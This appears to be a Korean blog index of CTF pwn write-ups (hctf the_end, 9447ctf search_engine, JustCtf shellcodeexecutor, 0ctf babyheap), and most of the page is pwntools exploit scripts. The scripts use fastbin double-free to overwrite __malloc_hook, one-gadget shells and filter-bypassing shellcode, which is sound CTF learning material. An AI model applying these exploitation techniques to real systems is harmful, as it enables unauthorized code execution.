hctf - the_end close(1) close(2) 이 두함수 때문에 정적 출력이 되지 않는다. 그리고 어느 주소에나 1바이트씩 쓸 수 있다. 내가 생각한 exploit 방법 함수의 마지막에 exit를 불러오는데 exit를 불러오면 __exit_funcs라는 라이브러리 심볼 구조체를 가지고 ‘run_exit_handlers’에 들어가는데 이때 ‘__rtld_global+3848’의 주소를 실행한다 따라서 __rtld_global+3848에 oneshot 주소를 넣으면 쉘을 딸수 있을거라 생각했다 1234567891011121314151617181920212223from pwn import * r=process('./the_end',env={'LD_PRELOAD':'./libc-2.23.so'})e=ELF('./the_end')libc=e.libcld=ELF('/lib/x86_64-linux-gnu/ld-2.23.so') sla=r.sendlineafterru=r.recvuntilsa=r.sendafters=r.send ru('gift ')leak=int(ru(',').replace(',',''),16)-libc.symbols['sleep']log.info(hex(leak)) for i in range(5): s(p64(leak+0x5f0f48+i)) s(p64(leak+0xf02a4)[i]) r.sendline('exec /bin/sh 1>&0') r.interactive()Colored...
[Read More]
9447ctf search_engine
9447ctf - search_engine
먼저 smallbin을 만들고 search를 이용하여 libc leak
fastbin 3개를 만들고 double free
fd를 __malloc_hook-35로 설정
__malloc_hook -> oneshot
get shell
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263from pwn import * def search(size,word): sla('3: Quit\n','1') sla('size:',str(size)) sa('word:',word) def index(size,sentence): sla('3: Quit\n','2') sla('size:',str(size)) sa('sentence:',sentence) r=process('./search')e=ELF('./search')libc=e.libconeshot=0x4526a sla=r.sendlineaftersa=r.sendafterru=r.recvuntil pay='s'*0x85+' m'index(len(pay),pay)search(1,'m') sla('?','y')search('1','\x00')ru('Found 135: ')leak=u64(r.recv(6).ljust(8,'\x00'))-0x3c4b78log.info(hex(leak))sla('?','n') pay='A'*0x5d+' a 'index(len(pay),pay)index(len(pay),pay)index(len(pay),pay) search(1,'a') sla('?','y')sla('?','y')sla('?','y') search(1,'\x00') sla('?','y')sla('?','y')sla('?','n') pay=p64(leak+libc.symbols['__malloc_hook']-35)*2pay=pay.ljust(0x5e,'A') payload='A'*19+p64(leak+0xf02a4)payload=payload.ljust(0x5d,'A') index(len(pay),pay)index(len(pay),pay)index(len(pay),pay)index(len(payload),payload) r.interactive() Colored by Color Scriptercs
[Read More]
Justctf shellcodeexecutor
JustCtf - shellcodeexecutor
12345678910111213141516171819202122232425262728from pwn import * context.arch='amd64' #r=process('./shellcodeexecutor')r=remote('2019.nc.jctf.pro',1446) sla=r.sendlineaftersa=r.sendafterru=r.recvuntil shellcode=''' xor rdi,rdi mov edi,1 lea rsi,[rip+0x6f] xor rdx,rdx mov edx,0xff xor rax,rax mov eax,1 syscall''' sla('>','2')sla('>','1')sla(':',asm('xor al,0')+asm(shellcode))sla('>','3')r.interactive()cs
내가 쉘을 실행하는곳 앞에 플래그가 저장되어 있어서 write로 읽었다
바이트 검사하는것은 널바이트를 포함한 이상한 코드 넣어서 우회하였다.
[Read More]
0ctf Babyheap
0ctf-babyheap
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273from pwn import * def allocate(size): sla('Command:','1') sla('Size:',str(size)) def fill(idx,size,fill): sla('Command:','2') sla('Index:',str(idx)) sla('Size:',str(size)) sa('Content:',fill) def free(idx): sla('Command:','3') sla('Index:',str(idx)) def dump(idx): sla('Command:','4') sla('Index:',str(idx)) r=process('./babyheap',env={'LD_PRELOAD':'./libc.so.6'})e=ELF('./babyheap')libc=e.libc sla=r.sendlineaftersa=r.sendafterru=r.recvuntil for i in range(4): allocate(0x10)allocate(0x80) free(2)free(1) pay=p64(0)*3+p64(0x21)pay+=p8(0x80) fill(0,len(pay),pay) pay=p64(0)*3+p64(0x21)fill(3,len(pay),pay) allocate(0x10)allocate(0x10) pay=p64(0)*3+p64(0x91)fill(3,len(pay),pay) allocate(0x80)free(4) dump(2)ru('Content: \n')leak=u64(r.recv(6).ljust(8,'\x00'))-0x3c4b78log.info(hex(leak)) allocate(0x68)free(4) pay=p64(0)*3+p64(0x71)+p64(leak+libc.symbols['__malloc_hook']-35)fill(3,len(pay),pay) allocate(0x60)allocate(0x60) pay='\x00'*3+p64(0)*2+p64(leak+0x4526a)fill(6,len(pay),pay) allocate(12) r.interactive() Colored by Color Scriptercs
기본적인 fastbin attack이다…
[Read More]
마크다운 작성 예시
마크다운 작성 예시
You can write regular markdown here and Jekyll will automatically convert it to a nice webpage. I strongly encourage you to take 5 minutes to learn how to write in markdown - it’ll teach you how to transform regular text into bold/italics/headings/tables/etc.
[Read More]